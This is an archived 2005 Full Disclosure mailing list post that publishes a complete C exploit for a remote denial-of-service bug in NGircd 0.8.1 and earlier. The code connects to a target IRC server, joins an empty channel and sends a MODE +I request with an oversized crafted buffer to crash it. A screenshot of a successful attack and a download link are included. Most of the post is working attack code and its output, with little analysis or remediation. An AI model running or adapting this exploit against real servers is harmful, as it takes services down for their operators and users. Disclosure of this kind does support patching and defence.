Full Disclosure mailing list archives
NGircd <= 0.8.1 Remote DoS (exploit)
From: "CorryL" <corryl () sitoverde com>
Date: Sat, 5 Feb 2005 19:21:25 +0100
The NGircd <= 0.8.1 il vulnerable in function Lists_MakeMask() of src/lists.c . The bug is discovered by Florian Westphal. This is exploit coded by Expanders component of x0n3-h4ck Italian Security Team ScreenShoot: -=[x0n3-h4ck]=--=[00:48:19]=--=[/root]=--=[Account: root]=- -=[#] ./ngircd_dos x0n3-h4ck.org 12345 Angel DarkChan -=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=- Connecting to target ...[Done] Building evil buffer ...[Done] Sending NICK ...[Done] Sending USER ...[Done] Joining Channel ...[Done] Sending evil request ...[Done] Trying to reconnect ...[Done] -> Attack Success! Lets party! The Irc Server is Killed !! Exploit: /* NGircd <= 0.8.1 Remote Denial Of Service Coded by: Expanders Usage: ./ngircd_dos <Host> <Ip> <NickToUse> <ChannellToJoin> NOTE: The channel must be EMPTY to let the exploit use +I mode Example: */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void help(char *program_name); int main(int argc, char *argv[]) { struct sockaddr_in trg; struct hostent *he; long addr; int sockfd, buff,rc; char evilbuf[1024]; char buffer[1024]; char *nick="AntiServer"; char *channel="Die_NGircd"; char *request; if(argv[3] != NULL) nick=argv[3]; if(argv[4] != NULL) channel=argv[4]; if(argc < 3 ) { help(argv[0]); exit(0); } printf("\n\n-=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=-\n"); he = gethostbyname(argv[1]); sockfd = socket(AF_INET, SOCK_STREAM, 0); request = (char *) malloc(12344); trg.sin_family = AF_INET; trg.sin_port = htons(atoi(argv[2])); trg.sin_addr = *((struct in_addr *) he->h_addr); memset(&(trg.sin_zero), '\0', 8); printf("\n\nConnecting to target \t..."); rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in)); if(rc==0) { printf("[Done]\nBuilding evil buffer\t..."); memset(evilbuf,65,300); memset(evilbuf+300,64,1); memset(evilbuf+301,65,128); printf("[Done]\nSending NICK \t..."); sprintf(request,"NICK %s\n",nick); send(sockfd,request,strlen(request),0); printf("[Done]\nSending USER \t..."); sprintf(request,"USER %s x0n3-h4ck.org eth0.x0n3-h4ck.org :%s\n",nick,nick); send(sockfd,request,strlen(request),0); buff=recv(sockfd, buffer, 256, 0); printf("[Done]\nJoining Channel \t..."); sprintf(request,"JOIN #%s\n",channel); send(sockfd,request,strlen(request),0); printf("[Done]\nSending evil request \t..."); sprintf(request,"MODE #%s +I %s\n",channel,evilbuf); send(sockfd,request,strlen(request),0); sprintf(request,"QUIT www.x0n3-h4ck.org\n",evilbuf); send(sockfd,request,strlen(request),0); sleep(2); printf("[Done]\nTrying to reconnect\t..."); close(sockfd); sockfd = socket(AF_INET, SOCK_STREAM, 0); sleep(1); rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in)); if(rc==0) printf("[Fail] -> Damn! Attack Failed!\n\n"); else printf("[Done] -> Attack Success! Lets party!\n\n"); } else printf("[Fail] -> Unable to connect\n\n"); close(sockfd); return 0; } void help(char *program_name) { printf("\n\t-=[ NGircd <= 0.8.1 Remote Denial Of Service ]=-\n"); printf("\t-=[ ]=-\n"); printf("\t-=[ Coded by ders -/www.x0n3-h4ck.org\\- ]=-\n\n"); printf("Usage: %s <Host> <Ip> <NickToUse> <ChannellToJoin>\n",program_name); } downloaded from http://x0n3-h4ck.org/upload/ngircd-0.8.1-dos.tar.gz Info: CorryL corryl80 () gmail com www.x0n3-h4ck.org _________________________________ www.seekstat.it is your web stat _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- NGircd <= 0.8.1 Remote DoS (exploit) CorryL (Feb 05)